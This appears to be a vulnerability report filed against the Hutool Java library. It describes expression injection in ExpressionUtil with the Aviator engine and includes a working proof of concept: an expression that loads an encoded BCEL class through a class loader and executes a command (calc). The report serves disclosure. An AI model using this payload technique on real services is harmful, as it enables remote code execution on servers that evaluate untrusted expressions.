ExpressionUtil 表达式注入

### 描述

根据 ***[官方文档](https://hutool.cn/docs/#/extra/%E8%A1%A8%E8%BE%BE%E5%BC%8F%E5%BC%95%E6%93%8E/%E8%A1%A8%E8%BE%BE%E5%BC%8F%E5%BC%95%E6%93%8E%E5%B0%81%E8%A3%85-ExpressionUtil)*** 提供的示例，使用 ***Aviator*** 模板引擎，当解析不受信任表达式字符串时，可能容易受到代码执行攻击，尽管使用是 ***Aviator*** 当前最新的版本(***5.3.3***)依然会受影响。

![输入图片说明](https://foruda.gitee.com/images/1673689474731771832/a84b5116_1974101.png "屏幕截图")

### 示例

```java
String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"calc\") );";
final Object eval = ExpressionUtil.eval(exp, null);
```

![输入图片说明](https://foruda.gitee.com/images/1673689470516492301/0d675133_1974101.png "屏幕截图")

### Reference

1. https://github.com/killme2008/aviatorscript/issues/421
2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41862
3. https://mvnrepository.com/artifact/com.googlecode.aviator/aviator

GVP chinabugotech/hutool

内容风险标识

评论 (5)

GVPchinabugotech/hutool

内容风险标识